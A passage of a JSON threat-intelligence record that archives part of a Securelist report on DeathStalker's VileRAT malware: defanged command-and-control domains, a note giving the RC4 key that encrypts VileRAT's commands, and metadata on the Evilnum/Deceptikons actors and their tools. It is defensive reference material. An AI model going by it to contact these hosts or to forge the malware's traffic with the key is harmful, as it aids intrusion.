cs[.]com\r\nmscloudin[.]com\r\nmsdllopt[.]com\r\nnetrcmapi[.]com\r\npcamanalytics[.]com\r\ndbcallog[.]com\r\nmsft-dev[.]com\r\nmsftapp[.]com\r\nmsftprint[.]com\r\nmsintsvc[.]com\r\npraxpay[.]org\r\nprint-hpcloud[.]com\r\nsvcscom[.]com\r\nunitedubai[.]org\r\nunitepixel[.]org\r\nadvflat[.]com\r\ncloudappcer[.]com\r\ncloudpdom[.]com\r\ndustforms[.]com\r\neconfuss[.]com\r\nezteching[.]com\r\ninfntio[.]com\r\nluccares[.]com\r\norklaus[.]com\r\nroboecloud[.]com\r\nwdigitalecloud[.]com\r\nadvertbart[.]com\r\nbunflun[.]com\r\ncovdd[.]org\r\ninetp-service[.]com\r\ninfcloudnet[.]com\r\nkhnga[.]com\r\nmailservice-ns[.]com\r\nwebinfors[.]com\r\nyomangaw[.]com\r\nazueracademy[.]com\r\ncyphschool[.]com\r\nimagegyne[.]com\r\nimageztun[.]com\r\nnetoode[.]com\r\nolymacademy[.]com\r\npivotnet[.]org\r\nfxmt4x[.]com\r\ntelecomwl[.]com\r\nxlmfx[.]com\r\n[1]\r\n This is an expected result from the standard CPython build chain: the build configuration will automatically tag a binary\r\nwith such version naming if compilation is done from sources that do not match a defined tag (for instance, 3.7.4) or are\r\nmodified.\r\n[2]\r\n All JSON dictionaries required by commands are URL-encoded, base64-encoded, and RC4-encrypted with a base64-encoded RC4 key of “XMpPrh70/0YsN3aPc4Q4VmopzKMGvhzlG4f6vk4LKkI=” (starting from VileRAT 3.0; previous\r\nsamples use a different key).\r\nSource: https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/"
	],
	"report_names": [
		"107075"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f7aa6029-2b01-4eee-8fe6-287330e087c9",
			"created_at": "2022-10-25T16:07:23.536763Z",
			"updated_at": "2026-04-10T02:00:04.646542Z",
			"deleted_at": null,
			"main_name": "Deceptikons",
			"aliases": [
				"DeathStalker",
				"Deceptikons"
			],
			"source_name": "ETDA:Deceptikons",
			"tools": [
				"EVILNUM",
				"Evilnum",
				"Janicab",
				"PowerPepper",
				"Powersing",
				"VileRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775446554,
	"ts_updated_at": 1775826726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/961ec3471b76aebe71c37d7de01be49ce7149179.pdf",
		"text": "https://archive.orkl.eu/961ec3471b76aebe71c37d7de01be49ce7149179.txt",
		"img": "https://archive.orkl.eu/961ec3471b76aebe71c37d7de01be49ce7149179.jpg"
	}
}